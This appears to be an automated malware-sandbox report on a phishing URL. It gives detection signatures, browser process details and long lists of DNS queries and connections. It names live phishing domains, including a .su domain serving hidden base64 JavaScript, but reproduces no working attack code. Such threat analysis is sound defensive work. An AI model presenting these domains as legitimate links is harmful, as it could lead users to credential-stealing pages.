Edit tour

Windows Analysis Report
https://zi2oykzw.zone.investir-sur-mesure.fr/

Overview

General Information

Sample URL:https://zi2oykzw.zone.investir-sur-mesure.fr/
Analysis ID:1502584
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Yara detected HtmlPhish44
HTML page contains suspicious base64 encoded javascript
Connects to several IPs in different countries
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://zi2oykzw.zone.investir-sur-mesure.fr/ MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2012,i,11304527697258639887,17499902385192278012,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_340JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://zi2oykzw.zone.investir-sur-mesure.fr/Avira URL Cloud: detection malicious, Label: malware
    Source: rsrl.ulvantiro.suVirustotal: Detection: 8%Perma Link

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_340, type: DROPPED
    Source: https://rsrl.ulvantiro.su/82xG/HTTP Parser: Base64 decoded: <script>
    Source: https://rsrl.ulvantiro.su/82xG/HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
    Source: https://zi2oykzw.zone.investir-sur-mesure.fr/HTTP Parser: No favicon
    Source: https://www.google.com/HTTP Parser: No favicon
    Source: https://www.google.com/HTTP Parser: No favicon
    Source: https://www.google.com/HTTP Parser: No favicon
    Source: https://zi2oykzw.zone.investir-sur-mesure.fr/HTTP Parser: No favicon
    Source: https://zi2oykzw.zone.investir-sur-mesure.fr/HTTP Parser: No favicon
    Source: https://www.google.com/HTTP Parser: No favicon
    Source: https://www.amazon.ae/HTTP Parser: No favicon
    Source: https://www.amazon.ae/HTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49723 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.17:49729 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.31.71:443 -> 192.168.2.17:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.31.71:443 -> 192.168.2.17:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49736 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.17:49739 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.17:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49741 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.130:443 -> 192.168.2.17:49746 version: TLS 1.2
    Source: unknownNetwork traffic detected: IP country count 10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 40.127.169.103
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 51.124.78.146
    Source: unknownTCP traffic detected without corresponding DNS query: 51.124.78.146
    Source: unknownTCP traffic detected without corresponding DNS query: 51.124.78.146
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
    Source: unknownTCP traffic detected without corresponding DNS query: 51.124.78.146
    Source: unknownTCP traffic detected without corresponding DNS query: 51.124.78.146
    Source: unknownTCP traffic detected without corresponding DNS query: 51.124.78.146
    Source: unknownTCP traffic detected without corresponding DNS query: 51.124.78.146
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.71
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.71
    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.71
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: global trafficDNS traffic detected: DNS query: zi2oykzw.zone.investir-sur-mesure.fr
    Source: global trafficDNS traffic detected: DNS query: b2cdata.marketing.moveaws.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: shoutout.wix.com
    Source: global trafficDNS traffic detected: DNS query: rsrl.ulvantiro.su
    Source: global trafficDNS traffic detected: DNS query: kia.jaishict.ru
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: ogs.google.com
    Source: global trafficDNS traffic detected: DNS query: apis.google.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: 1x7.prosolmi.su
    Source: global trafficDNS traffic detected: DNS query: www.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: images-eu.ssl-images-amazon.com
    Source: global trafficDNS traffic detected: DNS query: m.media-amazon.com
    Source: global trafficDNS traffic detected: DNS query: completion.amazon.com
    Source: global trafficDNS traffic detected: DNS query: fls-eu.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: unagi-eu.amazon.com
    Source: global trafficDNS traffic detected: DNS query: unagi.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: aax-eu.amazon-adsystem.com
    Source: global trafficDNS traffic detected: DNS query: completion.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
    Source: global trafficDNS traffic detected: DNS query: match.360yield.com
    Source: global trafficDNS traffic detected: DNS query: audex.userreport.com
    Source: global trafficDNS traffic detected: DNS query: rd.frontend.weborama.fr
    Source: global trafficDNS traffic detected: DNS query: rtb-csync.smartadserver.com
    Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: tags.bluekai.com
    Source: global trafficDNS traffic detected: DNS query: pbs.yahoo.com
    Source: global trafficDNS traffic detected: DNS query: capi.connatix.com
    Source: global trafficDNS traffic detected: DNS query: amazon.partners.tremorhub.com
    Source: global trafficDNS traffic detected: DNS query: public-prod-dspcookiematching.dmxleo.com
    Source: global trafficDNS traffic detected: DNS query: spl.zeotap.com
    Source: global trafficDNS traffic detected: DNS query: ads.stickyadstv.com
    Source: global trafficDNS traffic detected: DNS query: sync.rfp.fout.jp
    Source: global trafficDNS traffic detected: DNS query: beacon.krxd.net
    Source: global trafficDNS traffic detected: DNS query: x.bidswitch.net
    Source: global trafficDNS traffic detected: DNS query: match.sharethrough.com
    Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
    Source: global trafficDNS traffic detected: DNS query: s.amazon-adsystem.com
    Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
    Source: global trafficDNS traffic detected: DNS query: odr.mookie1.com
    Source: global trafficDNS traffic detected: DNS query: c1.adform.net
    Source: global trafficDNS traffic detected: DNS query: bs.serving-sys.com
    Source: global trafficDNS traffic detected: DNS query: cookie-matching.mediarithmics.com
    Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: usermatch.krxd.net
    Source: global trafficDNS traffic detected: DNS query: csync.loopme.me
    Source: global trafficDNS traffic detected: DNS query: us-u.openx.net
    Source: global trafficDNS traffic detected: DNS query: ssum-sec.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: lm.serving-sys.com
    Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
    Source: global trafficDNS traffic detected: DNS query: uipglob.semasio.net
    Source: global trafficDNS traffic detected: DNS query: crb.kargo.com
    Source: global trafficDNS traffic detected: DNS query: usersync.gumgum.com
    Source: global trafficDNS traffic detected: DNS query: uipus.semasio.net
    Source: global trafficDNS traffic detected: DNS query: image2.pubmatic.com
    Source: global trafficDNS traffic detected: DNS query: loadus.exelator.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: sync-amazon.ads.yieldmo.com
    Source: global trafficDNS traffic detected: DNS query: sync.sxp.smartclip.net
    Source: global trafficDNS traffic detected: DNS query: image6.pubmatic.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
    Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
